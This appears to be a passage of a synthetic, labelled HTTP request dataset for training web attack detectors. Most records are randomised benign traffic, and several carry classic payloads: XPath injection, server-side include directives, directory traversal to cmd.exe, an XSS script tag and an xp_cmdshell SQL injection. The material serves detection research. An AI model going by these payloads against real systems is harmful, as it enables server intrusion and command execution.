Transfer-Encoding: gzip
Upgrade: s0xkh/1.0, aoohr/0.2, neh/8.7, kmSce/3.3
Warning: 564 18.22.111.11 "soshftojabnnOr7rjean" 
X-Forwarded-For: 73.229.35.89
X-Serial-Number: 25177874898076816291
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 243
Start - Id: 35858
class: XPathInjection
GET /NiwaoTzoxo/solroeeivjl7o/d@S/yO4VBu68rTSHh.msf?eOoiti=164912951&aTRotwqtoi=4329872&pn.Lvvv=5&aeeeueoaTjese=iG%3Be%27rlst&ayl248nhnrTei=tawatslrne&ejorp2a4ugl=hde+&aipea=604+or++++nh%2Fr%2Foijosn%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D930%5D+++or++372%3D&alolc=y3h8a9tu&tiaia42RdP=eautoexeceksSl&itimibtjs6snsis=-Rw&iihe0erx15la=89222&ep=ed%3A&4s0f=hkVc7a-2ccg&eym=lehl HTTP/1.0
Host: 192.89.78.160
Connection: vjlmvne
Accept: */*;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: gzip;q=0.3, identity;q=0.6, deflate;q=0.4
Accept-Language: c-t, l-th7ufe;q=0.4, it-ssReEe, anbri-oytbp, dept-72l
Cache-Control: max-age=975
Client-ip: 0.81.94.80
Cookie: dr=71138;J5HpXZuPZCVm=013;mathooei=t/Gl1unph-aW)|yse;ynoaotwla9=l7ncoqs)ns;hE=406919
Cookie2: $Version="9"
Date: Tue, 15 Apr 08 10:13:52 UTC
ETag: "bhOsZQ9I08QZQJM3GB.5"
Expect: 100-continue
From: alcSeiee@shniectns.be
If-Modified-Since: Mon, 19 Oct 09 08:26:54 GMT
If-Unmodified-Since: Fri, 21 Dec 07 24:33:04 CET
If-Match: "75ogcdEg1tIwP2ZdWlK7"
If-None-Match: *
If-Range: "xSRlx4K0Vf@PBz_L"
Max-Forwards: 64
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic MGFnc01zaWk6cDlzaW4=
Authorization: Basic aXNuZXN1bG86aElpY25PZmk=
Range: -15
Referer: http://auttLr3e.it/reciio/esaam6cr/uo03be/pTNwoq.jpg
TE: deflate
Trailer: Range
User-Agent: dZBWVjzOE http://www.chami.gov
UA-CPU: Sparc
UA-Disp: 747,476,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4135x5853
Via: FTP/4.0 239.72.167.164:82, HTTP/8.7 www.3asH.css, FTP/7.5 119.223.249.201
Transfer-Encoding: gzip
Upgrade: ei2y/3.0
Warning: 278 124.130.70.150 "dewioT68Dmdytekib4" "Tue, 23 Nov 04 10:02:15 GMT"
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 83889853145892267537
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35858
Start - Id: 21712
class: Valid
GET /h5cn8oplsrads/eHo@kH/ewG-/Wc_Yeval/wyEyTinono/8Qbk/iYaincluden2RRleG6@M/n3nttmyai.html?tnec3tl=qeBYuc&rensmsg=E%27ycsrshutdowns1a&obn=556789&lln6o=%7E+mHacedu+eewnz&tiosseNN7eRk=xxmle%3Ei&iAI2optHA=aatrouSr2nleiu HTTP/1.0
Host: 68.127.77.119
Connection: keep-alive
Accept: audio/basic, image/png;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: nseiat-kblgifea, ugd-prieu, hei-r;q=0.7, sa7ist-ittf7;q=0.1, u5euwea-b
Cache-Control: no-store
Client-ip: 59.146.57.156
Cookie: 6sx3nxhinrSpo=465895;isq=catphpprh;Kconnect3T_=oew0atironehsaeh2;u8zicihoennhu=0568536418;j8wp-TL6ATMU4=wAX7-jM;bKadminx_bnog=tAnSSVP_
Cookie2: $Version="651"
Date: Thu, 30 Mar 06 17:42:27 CET
ETag: W/"SVQ1pQYh6OCY1WFqHRW"
Expect: J8adhsu
From: pd5ue@mslawiH.biz
If-Modified-Since: Wed, 04 May 05 22:01:41 UTC
If-Unmodified-Since: Tue, 13 Sep 05 03:16:01 CET
If-Match: *
If-None-Match: "p9kWcpEsbtw4F_ud"
If-Range: Tue, 12 Sep 06 13:35:09 CET
Max-Forwards: 01
MIME-Version: 5.7
Pragma: ti=hhdo8eg
Proxy-Authorization: Basic ZXVlOTpyc2Vpaw==
Authorization: Basic cnRpdHk6cm90Y2U=
Range: 5266-9,06-522712,3-
Referer: http://ndut.com/u2hpF.jpeg
TE: chunked,trailers
Trailer: Trailer
User-Agent: Mozilla/2.1 (Windows; U; Win 9x 2.0; ti-fz; rv:8.9.8) Gecko/55727284
UA-CPU: Sparc
UA-Disp: 299,773,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 664x378
Via: FTP/4.2 58.46.233.43
Transfer-Encoding: identity
Upgrade: cOZhi/2.4, vroA/8.4, sad/7.8, Ptnyns/5.0
Warning: 456 16.111.210.179 "htasayeJyno" "Fri, 12 Nov 04 12:32:53 CET"
X-Forwarded-For: 98.250.132.6
X-Serial-Number: 15865
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21712
Start - Id: 19886
class: Valid
GET /tihriosiz1nimg.gif?gsdx1N=p8%26Eh+%2B8tnc&sendveidig=%3ANlG+s&NR=rzea&irOiotsnerXa=toeafrallohiiazzd&9input_exec0Cv=re+at+&Cako=qkt%28OhhAgogh&1e9Dsaj9arhr2a=l%3F%3ApeiframepoR&thiatal=aigdneaa&ornode@qEiBCATs=k5Eess&LpDqAx4O6=hjSB&Ei=bcDp&i5rrgetszund8p=sUsn4Puj HTTP/1.1
Host: 172.4.235.78:7976
Connection: keep-alive
Accept: video/mpeg, image/*;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 203.92.31.130
Cookie: inrE=i2aWricormyd;DdTdEfejsrsnt=xUKZq@;elny=rtd
Cookie2: $Version="623"
Date: Fri, 11 Jan 08 11:56:45 GMT
ETag: "mOAzKfyk9G9n6tkXH"
Expect: dfhaseA=enbhte;eaotIr=auhdL
From: 0nO7ys@itae.cz
If-Modified-Since: Fri, 10 Feb 06 15:32:33 CET
If-Unmodified-Since: Wed, 16 Jun 04 22:51:17 GMT
If-Match: *
If-None-Match: *
If-Range: "oN4Vx7sVUOlTfXt7"
Max-Forwards: 2953
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: NTLM dWozYXRwb29tc3lvY3MwYW50ZXdhVW1ueXNyaG5TeHRPaXBoc2Vl
Authorization: NTLM bmVyZGhoaXYyQmRiZGVzZ3RjYmhybG9tc2RzZWVlZHNyaXN0YWUwRG5ad2Ju
Range: 3910-41090
Referer: http://rwiaalt.net/onofin/e0iamao/nanhrc/gtaeu.mdb
TE: gzip,trailers,gzip
Trailer: Authorization
User-Agent: tetnnaPUJI/7.7.1
UA-CPU: StrongARM
UA-Disp: 1517,0390,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 205x6501
Via: 8.7 227.1.12.176, seo/0.1 www.tddi.htm, 1.4 www.c1rt.js:42
Transfer-Encoding: setynt; rlrseef=oh32tdo
Upgrade: aSn/7.4
Warning: 796 165.248.243.125:49 "nsa0mTYgni7ti" "Wed, 31 Mar 10 02:21:30 UTC"
X-Forwarded-For: 176.249.106.242
X-Serial-Number: 11565952861690
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19886
Start - Id: 22720
class: Valid
GET /hrou/8V1outkdM1o.msf?TtAo=up4 HTTP/1.0
Host: www.ecet.gov
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 180.53.52.110
Cookie: rirsocmleTbjq=9487626789;ltRFrc4u=homeservicesae  actpi
Cookie2: $Version="0"
Date: Sun, 10 Apr 05 04:51:28 UTC
ETag: W/"bLoFBZPZmB2CMZvAMZB"
Expect: tRest=aE3Funp
From: labOkeyp@Tmrr6ene.de
If-Modified-Since: Sat, 15 Dec 07 24:02:32 GMT
If-Unmodified-Since: Sat, 18 Feb 06 15:14:04 GMT
If-Match: "M5bVXTXtJwSNrkylMqw-"
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 0.1
Pragma: eeao6aei='nE6stdaH'
Proxy-Authorization: NTLM bGVyZGxyc2RhY3JkdGFmeWVuODlBZzhKcGFiYXRud2FudnhzZGFsbWVtbzg=
Authorization: Digest response="aCbEeBc351acf15292CB9F6CdfB2c0d9"
Range: 740774-
Referer: http://hfand.gov/eini.gif
TE: trailers
Trailer: Pragma
User-Agent: EvndDh6 (wNutYpq; a.x5N8Do)
UA-CPU: x86
UA-Disp: 949,175,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0084x738
Via: 7.4 159.7.134.104, 7.7 244.244.145.34:28, 8.5 www.eDseOd.js
Transfer-Encoding: compress
Upgrade: npstdo/2.1, Bagih/0.7, ysdS/4.0, iMl/4.5
Warning: 405 www.hedts.tiff "9neamsw9eeTeirmfn" 
X-Forwarded-For: 57.171.74.241
X-Serial-Number: 46126280
----: ----------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 22720
Start - Id: 40647
class: SSI
GET /sF.E0hH_Xqh40A2@KnqR/atatr3o/rdntNy/xVetcBK4HapassthrujsNQn/4alatn5uUjn/rao/oonglnxptjhtsotig/obO/eueoeerzirseries/S_gJkED5Il.mdb?XZPXBprocessing-instruction705u=to&sUktoAt7=npo%3Dw&tr=v&0chamneW=lF%40e&jc0lrmaabmmO=tm5hInchs%3E+Dupassthruar%5Detc&fmgoyiigSDh=gr+agoeNKt7N5&EEn=2012&FpAkVdelete9AT2=%3C%21--++++%23include++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+--%3E&lthfnntoigcdc7=3656&eAtteb6nylo=s_DxT7h&iasn4nE=xtlrwbI2&7mg3DCrGc=nh3e1oit&dzdEafnjfo=%26Hn+8nhtpasslh&laualifdgni=ar HTTP/1.1
Host: www.taccnt.cz
Connection: itiia
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rviqda-9nbrg;q=0.9, qNkihn-ezaN;q=0.5, ireRsfia-db;q=0.7, ld6ho-btastth;q=0.5, oRe1ht-vmg
Cache-Control: max-stale=420
Client-ip: 26.207.222.161
Cookie: 0Reeynt=sa\;nalmm=65082
Cookie2: $Version="931"
Date: Wed, 27 May 09 18:34:28 CET
ETag: "lBtTht_ysib8rxO9l@2"
Expect: ooeos=S6heu
From: OhLEoh@pga5e.org
If-Modified-Since: Thu, 11 May 06 22:07:16 GMT
If-Unmodified-Since: Mon, 05 Mar 07 13:25:11 UTC
If-Match: "mpZQ@IwxTC8g8jdXcuQZ"
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 0.6
Pragma: bome=mwge
Proxy-Authorization: sfoht tsob=EeAAttxn
Authorization: NTLM b0hoMGVlOGd0ZXRhZTc3b25uc0M0Z2V2b2dvT3BvZXRoVGU=
Range: 176-,5948-8668,8671-305
Referer: http://www.Entt.it/3c8tex/qrtepU/dFcnah/rn2FbDo/3eaeeteo.exe
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: rllqtEaeer
UA-CPU: PowerPC
UA-Disp: 959,926,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 951x487
Via: FTP/0.9 www.dfite.htm
Transfer-Encoding: gzip
Upgrade: eeyr/9.4
Warning: 643 www.anntntto.js "msA0earuygs" 
X-Forwarded-For: 197.32.78.234
X-Serial-Number: 552421
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40647
Start - Id: 9312
class: Valid
GET /kkh1xDs2ZAgU-.html? HTTP/1.0
Host: 77.225.88.233:80
Connection: awvvtdeq
Accept: */*
Accept-Charset: utf-8, windows-1255;q=0.7
Accept-Encoding: 
Accept-Language: m-mmgmitl;q=0.2, aww-insolni, eHisd-meed7;q=0.1, t-mn, s7nhmeew-ehys
Cache-Control: no-cache
Client-ip: 175.5.251.201
Cookie: acsa2nhp5m2s=932205;nKyd5ftqjrigT=2943
Cookie2: $Version="3"
Date: Tue, 15 May 07 23:25:23 GMT
ETag: W/"hw2zXSFp4XEAqX_fn-"
Expect: sr3A
From: sexataI@lgbo5ae.uk
If-Modified-Since: Sat, 24 Sep 05 20:04:12 UTC
If-Unmodified-Since: Thu, 16 Aug 07 03:25:36 UTC
If-Match: "iGUa4642nrXPk-ASt-td"
If-None-Match: *
If-Range: *
Max-Forwards: 45
MIME-Version: 5.7
Pragma: tbteaaiz='wrd'
Proxy-Authorization: Digest realm
Authorization: daaa 1ihhfaim=atis
Range: -06
Referer: http://www.ifLID5y.gov/rto9dloe/aavCni/6atte/ieioso/3hssomei.bin
TE: trailers,gzip;q=0.9,chunked
Trailer: Transfer-Encoding
User-Agent: essbulVzoDarl8n
UA-CPU: 68000
UA-Disp: 7621,4110,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 766x0669
Via: HTTP/2.7 www.opuceash.tiff, nYroSp/7.7 www.9grpiu.htm, 9.6 174.185.139.137
Transfer-Encoding: gzip
Upgrade: u0F/4.5, tzae/8.8, r6d/0.0
Warning: 170 83.104.71.61 "wr0hialdc" 
X-Forwarded-For: 156.126.164.181
X-Serial-Number: 8554851
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9312
Start - Id: 27193
class: Valid
GET /aiuYFpx82a1/mM1PutPlg/CfZEiMI/weot6eeemy/t3netcatls5K/toearapIdssdahb/loanolHRyalo/8eoTnc7u2Sdaom1ni/tUbtop4fKH4F/s0Aez4I0Jcv60vKw/utstpoe4oed8lefMts/W6t99aOd4SabCFE.php?aecasmeds4e=24696&niAAu=030&qnnsoiAbanfMt=4It5%29%5BgS8%3C HTTP/1.1
Host: www.3cAs.net:75307
Connection: CrtcD
Accept: image/*, application/postscript;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ayr-e8s;q=0.3, ddoe-s, ntmc-l2ai3un;q=0.6, s5oqfi-yuih
Cache-Control: no-cache
Client-ip: 177.226.50.169
Cookie: tyg1rttil=2107020
Cookie2: $Version="4"
Date: Mon, 13 Jul 09 15:40:08 CET
ETag: "v6laF5Qbp0MAbwY2Um"
Expect: BestoiDe
From: tnEr3ec@tnrtge.com
If-Modified-Since: Tue, 16 Dec 08 19:47:23 GMT
If-Unmodified-Since: Thu, 18 Oct 07 07:52:05 CET
If-Match: "veHhOwRG7HiOI7tjq"
If-None-Match: *
If-Range: Mon, 20 Dec 04 06:51:38 GMT
Max-Forwards: 90
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="lectex2b"
Authorization: NTLM cmxvbmhlZW1ldWVvcmh1aHJ1b2lxcmUxSXNjbmhyN29vaDc=
Range: 699285-,85178-1
Referer: http://www.mseoFsib.de/dmte/hytWh.jpeg
TE: trailers
Trailer: Connection
User-Agent: bvno1t/7.3.1.0.6
UA-CPU: x86
UA-Disp: 451,9242,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3319x950
Via: HTTP/4.6 www.rovq.gif:0, HTTP/9.3 213.132.249.172
Transfer-Encoding: deflate
Upgrade: Etiah/8.1, hsg/1.5
Warning: 012 249.202.129.195 "qlunrYneiw7Ooerioi" 
X-Forwarded-For: 202.203.219.213
X-Serial-Number: 437437535
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 27193
Start - Id: 40952
class: SSI
POST /izFLuaQLaQSl/ZdpasswdxcatQMtE6ANhtaccesPm/h9lchoahS/.45betweeni.dll? HTTP/1.1
Content-Length: 119
Content-Language: hq
Content-Encoding: compress
Content-Location: http://teoejmt.uk/ltcmmoh/euooc/etSleot/xdte/ylaA0no3.htm
Content-MD5: aXRjdmRoaXhidGFkbzVSbA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Jan 10 01:27:48 GMT
Last-Modified: Thu, 27 Aug 09 19:38:38 UTC
Host: 40.143.65.50:66470
Connection: al3o
Accept: text/html, image/*, image/*;q=0.8
Accept-Charset: euc-kr;q=0.4, shift_jis, euc-cn;q=0.7, windows-1251, shift_jis;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 60.165.102.233
Cookie: Eit=r;lexecEC6RoT=4449987;Z3Uaccept.kT=eoe8=tbiae;eIxsgeentoncu=cloelfta4n0sascr0i;nhnsKt9Dead=%p
Date: Mon, 04 Jan 10 18:15:59 GMT
ETag: W/"e7Krdv@marjOOML46G."
Expect: 6rheoiee
If-Modified-Since: Mon, 12 Feb 07 18:24:53 UTC
If-Match: "tO4-HP2OMoDjwpgdA"
If-None-Match: "GDeEfG.BgkennETRUR"
Max-Forwards: 89
Pragma: ylb=ANc
Proxy-Authorization: Digest cnonce="ra0aep"
Authorization: Digest realm
Range: 966916-888
Referer: /ktioinx/htiu/6teh/scyr/brgsse1a.swf
TE: gzip
User-Agent: <!-- #odbc  connect="vaktax,ruotm,fSSos"       statement="select   *   from   tfa"-->
UA-Disp: 6856,2269,16
Via: nee9/5.5 17.156.174.121:60608, 8.6 44.247.213.109
Transfer-Encoding: compress
----: ------------------------------

ngi44oka6yTd4s=rTaaN rgz&iyXwaw@Z=weeunkrHingt9&GyOwsglocation9=aiSf(hnt fne;|:|Ye?&JfbpN=oe&isteqao=?Epe

End - Id: 40952
Start - Id: 43986
class: OsCommanding
GET ..%c1%8s...%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.ftssiru.st:1
Connection: close
Accept: */*
Accept-Charset: windows-1258, shift_jis, x-mac-japanese
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 60.172.21.158
Cookie: lRtftdiaos=l5ldropt;nattts=e/;V9ftpNpassthruBnull=~ p;RnSq1e8e=e3y0e5ai
Cookie2: $Version="880"
Date: Sun, 22 Feb 09 01:39:51 CET
ETag: "eWaaxQ@0tex2f3f4WX"
Expect: 100-continue
From: 44fa@mshrPyo.gov
If-Modified-Since: Wed, 10 Jun 09 21:13:12 CET
If-Unmodified-Since: Mon, 14 Aug 06 01:46:33 CET
If-Match: "0HCku5I6FQGDVvH"
If-None-Match: "uY20zzYkeH0twEb"
If-Range: "xP75Aa9058Vh6nUsJeL"
Max-Forwards: 37
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Qyeeu qzNllaee=zsachi
Authorization: Digest opaque="rpcs"
Range: -2,795-,-91
Referer: http://t7Lu3.de/t7e0ewue/9iTehra/p2esl.jsp
TE: trailers
Trailer: Referer
User-Agent: hiaa/8.5.7.3
UA-CPU: x86
UA-Disp: 402,257,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5667x180
Via: 5.5 68.98.66.251, 2.3 www.ouisohz3.jpg
Transfer-Encoding: identity
Upgrade: dsss/1.1, o8rt/7.8, 7ln/9.8
Warning: 170 126.27.186.211 "do3kdsikezlS" "Fri, 29 May 09 15:50:00 UTC"
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 1714241
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43986
Start - Id: 48164
class: XSS
GET /ptraehf/gDB.EoQrwRs3SDPagln-/udogzahqtu7tO/ue1QerdrEnhe/En0rll1diep/0imbQ0KpD/Rs3giefpe/hfaXY6TGOSjzyKc/N4libPRHcX_9optN/kesTcnirnu3aofcS.shtml?iioctlhobolt=axJF&stylewA5includelgJF5=hBqJydRI7&emsw6fioivtj=eiAoeftpf+aem0iw&enhhciuleeot=e&tLRR0dHmo=%3Cstyle+type%3D++%22+text%2Fjavascript++%22++++%3E%5Balert++++%28%27dus%27%29%3B%5D%3C%2Fstyle+%3E&Ownhvane=es9Ts&3FWY_homesEo=ochttpegmetakkst%26ys&tynha3tgni=tehrmgilwneLxml&on1etfr5o=1141&eegilEttssoeEec=bUc.&1oasiglIen=754 HTTP/1.0
Host: 110.218.41.173
Connection: close
Accept: */*
Accept-Charset: x-mac-hebrew;q=0.5, cp-936, iso-8859-6;q=0.3, us-ascii
Accept-Encoding: *;q=0.4
Accept-Language: beneg-yies;q=0.9, af-aatrz;q=0.2, htt-nhE
Cache-Control: min-fresh=6478
Client-ip: 211.190.214.99
Cookie: toleteeo6dn9Ei4=dectgAgs;BUwXoaccess_logfEsystemO=?th em'$hud2;ooshgihh=t3t @Btvbscript;hooaiilnmvgjob4=50
Cookie2: $Version="6"
Date: Wed, 08 Oct 08 07:57:57 UTC
ETag: W/"KTjmOB4QF.aHd_v"
Expect: 100-continue
From: sfatroh@4tt9delj7a.org
If-Modified-Since: Wed, 03 Nov 04 03:30:58 UTC
If-Unmodified-Since: Tue, 21 Oct 08 07:14:07 GMT
If-Match: *
If-None-Match: "ZVMgKa2V8G1t.pxv"
If-Range: Sat, 31 Dec 05 16:00:02 CET
Max-Forwards: 76
MIME-Version: 7.0
Pragma: no-cache
Authorization: NTLM dHJrZWRhZDlzZXR5b2VlYWJUSm1sZHNRbXRpaG5ldG5sbG90
Range: 248-
Referer: http://www.ir9eit.uk/vvxt.fgf
TE: trailers
Trailer: If-Range
User-Agent: DnWnarth (i9XevNTY; nZBux2u3sl)
UA-CPU: MIPS
UA-Disp: 472,3569,8
UA-OS: Win98
UA-Color: color16
Via: Xtp/2.8 68.47.189.195, FTP/8.0 106.168.39.64
Transfer-Encoding: grg3ro
Warning: 469 www.eeshc.gif:6 "8tbhssqusptoj" 
X-Forwarded-For: 129.132.255.71
X-Serial-Number: 532844106814003
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48164
Start - Id: 34191
class: Valid
POST /jWLoC/.OB0CtHKq/DCsoTeetgde/h89/nSU9hDj4-/et8hnfaam/u7in1/rRklLtBplwnK30Jo7je/e1tCq/te6sat0r.jpg? HTTP/1.1
Content-Length: 80
Content-Language: i,rbpibal,ieiau
Content-Encoding: deflate
Content-Location: /l2rosn.avi
Content-MD5: ZTVlaDl2VEh0cnk2NWhsMg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 Aug 05 24:24:04 CET
Last-Modified: Tue, 08 Aug 06 21:34:01 GMT
Host: 141.54.143.183:7
Connection: mhf0eX
Accept: video/*;q=0.1, text/plain, audio/*;q=0.4
Accept-Charset: *
Accept-Encoding: identity;q=0.3, identity
Accept-Language: *;q=0.0
Cache-Control: max-stale=9303
Client-ip: 195.30.83.12
Cookie: merbmypn=e ('0ettsplibhttHnullok;4chyzf1ANqEaati=56778;hwhs0h6x7=5646137;g3ngrnR6ljehae=3084
Cookie2: $Version="0"
Date: Tue, 08 Mar 05 16:42:27 CET
ETag: "ehlGSz.VF..ZXY@"
Expect: 100-continue
From: llrradu@4vhsetp.com
If-Modified-Since: Sat, 19 May 07 23:08:56 UTC
If-Unmodified-Since: Tue, 08 Feb 05 24:36:27 UTC
If-Match: "oyBc2v@AZZpBH6R8w"
If-None-Match: "Pq07t6DZ-gzYt6ek"
If-Range: Mon, 14 Apr 08 08:18:52 CET
Max-Forwards: 15
MIME-Version: 9.2
Pragma: dp=dwhea
Proxy-Authorization: Digest username="pcny3"
Authorization: tee8Or yndng=slseSssf
Range: 11-
Referer: /uoLenta/ngthr.mdb
TE: gzip;q=0.8,gzip
Trailer: Authorization
User-Agent: Mozilla/5.5 (compatible; Konqueror/2.7; WinNT; zebAor; ertn1Hdhh; ehnfa)
UA-CPU: 68000
UA-Disp: 0739,0435,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 306x913
Via: eqio/0.0 235.167.251.183:1, 4.8 177.227.36.132, 1.6 56.97.42.32
Transfer-Encoding: deflate
Upgrade: eissq/2.6, edbop/3.0, msete/8.4, Ioaens/7.8, gn6l/7.1
Warning: 577 www.iatho3sd.html:85826 "eyhmejnm9eoqif6ur52E" 
X-Forwarded-For: 39.178.242.76
X-Serial-Number: 883271657370029
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rt2=e5AmiWJM5RbV&nemuteltey4=20Z31vH1x6eJ&-nsock_streamDkMt=4&2aaua6eaAO0zeHr=1e

End - Id: 34191
Start - Id: 40979
class: SqlInjection
GET /nCw1/aWrjpLLEwN/CgkkuMGshutdown/bouh9hepqemc1neBn/efavrlf3eln5e3huH/a5K8zGxBVW/e2YNlPMzbih4beRik2/tkbuoitIdtt.php?hfeur=Zxp_e80&9qsf=jDg2CPlZ7CVP&olm=vesy+t5ndq&1IhWrELsGJ3G=en7hueaaAausokc&isel=rtsew%3Dnetcate3&gleh4=mphkZezrrmmS9 HTTP/1.0
Host: 64.154.183.246:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Encoding: exec    xp_cmdshell     '"2FutdEe" >>   script.vbs'
Accept-Language: *;q=0.6
Expect: 100-continue
If-None-Match: *
If-Range: Mon, 31 Oct 05 03:44:47 CET
Max-Forwards: 36
Proxy-Authorization: Digest uri=http://www.at0ieds.de/sdot/rtwtfaE.mspx
Authorization: Flmmrs nO4hhis=eIqa
Referer: /eE8t.txt
User-Agent: Mozilla/0.5 (Machintosh; U; PPC Mac OS X 2.1; ne-th; rv:9.9.5) Gecko/02529486
UA-Pixels: 1606x7502
Transfer-Encoding: aIIBe; ocsri1wL=oDfa

null

End - Id: 40979
Start - Id: 24668
class: Valid
GET /p5LoTmsrskpYoHsh.htm?peHza=oXaidZ-zBo&d2s2nvesDutoe=bmmenie%2B+9mi&rXkiDER=184488057&V8F24CPWGg=anut%26hg6feeu%5CSavhtpassrde&sZttr0reRDmg=%28tsed&6nioaRe=135&@8Cmt.oU=ngTd%29s%5Ceofxt5oebetweenusr+%3A&adnoEe=eeu1ieeacssifeftoe&oOsdlru7ejhs=yy&access_loggroup byKegQrZ=01719603&rtI=844518&afn=it HTTP/1.1
Host: 52.142.123.135
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.0
Accept-Language: E-a8irBq;q=0.8, 4ff2-n5sfe, Ehstr1id-eyRig, ey7eaeQ-nn;q=0.5, sDe2n-doc9os60;q=0.1
Cache-Control: max-stale
Client-ip: 148.233.252.203
Cookie: in4knr=-dO ;uiw=wenauelameieuy9;rdmrct=5;IUIEZ=aZssae&9cathtaccesed;cC.N6P9ae.X=]o8c1o
Cookie2: $Version="662"
Date: Fri, 04 Apr 08 16:36:17 UTC
ETag: "E23@zmqtynS5u3jM_G-W"
Expect: u5o62at
From: tloo@08oaacota.gov
If-Modified-Since: Wed, 05 Jan 05 01:18:56 GMT
If-Unmodified-Since: Sat, 04 Sep 04 24:19:49 CET
If-Match: "irvrAA6B0zswydz6ucJN"
If-None-Match: *
If-Range: Sun, 25 Jan 04 02:56:37 CET
Max-Forwards: 6
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: ey32r aystd9=ymtsuleh
Authorization: Basic bm1KNWU6ZWg5bWg=
Range: 7216-
Referer: http://www.aeeea.gov/ttiie/ihttf/fwieo9h.dll
TE: gzip;q=0.7,trailers,trailers
Trailer: Expect
User-Agent: vgqaKX http://www.rrpid3.cz
UA-CPU: PowerPC
UA-Disp: 986,554,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 089x5784
Via: 7.7 132.145.109.166
Transfer-Encoding: compress
Upgrade: Eiia/0.3, 5tg/5.8
Warning: 540 44.10.123.96:4 "peien0ehi" 
X-Forwarded-For: 186.140.0.183
X-Serial-Number: 791354389748242566
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 24668
Start - Id: 26104
class: Valid
GET /v8b/l4ndwix4Ni4sDle9t3/P0tcsac/nhAtpdelIhExionglau.htm? HTTP/1.0
Host: www.E6eifLirm.de
Connection: keep-alive
Accept: video/quicktime, text/html
Accept-Charset: windows-1254;q=0.2, euc-jp, iso-8859-9;q=0.4
Accept-Encoding: 
Accept-Language: Lrngj6-hei3wTeu, 9rcglu-8wnw;q=0.3
Cache-Control: min-fresh=228
Client-ip: 15.51.184.61
Cookie: gosWObc=6602057486;reT0otae=fwGwwn;nno=[oehnrs6st;e4n=%pj cn;Ay2p2nMsAQ=33350703;g90te=my27n53emi
Cookie2: $Version="1"
Date: Sun, 10 Apr 05 01:24:19 UTC
ETag: W/"lsBUJ6tUgc9GNHK@EM"
Expect: 100-continue
From: onjJtaeo@rtkFe9o2gi.st
If-Modified-Since: Sun, 16 Aug 09 06:56:02 UTC
If-Unmodified-Since: Sat, 28 Feb 09 04:54:57 UTC
If-Match: *
If-None-Match: "v8sSexrVJOXAJSSR"
If-Range: "jxyFhrt@Hjj.wtQMG"
Max-Forwards: 2
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: cqliad ydYennje=qeoJcce
Authorization: Digest opaque="e6cr"
Range: 794-
Referer: http://ssgdlN.be/cajrc/fdrA.mpeg
TE: trailers
Trailer: If-Range
User-Agent: TaataHYmf (g7fJnRT6M; 7.Wf.arE1)
UA-CPU: Sparc
UA-Disp: 5226,2357,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 096x0326
Via: HTTP/4.2 88.7.59.26
Transfer-Encoding: gzip
Upgrade: ofesrr/6.5, wiTer/0.7
Warning: 835 www.A01s.js "hdtheryfnaiEj" 
X-Forwarded-For: 65.12.255.69
X-Serial-Number: 247588514847366
----: ---------------------------------------------
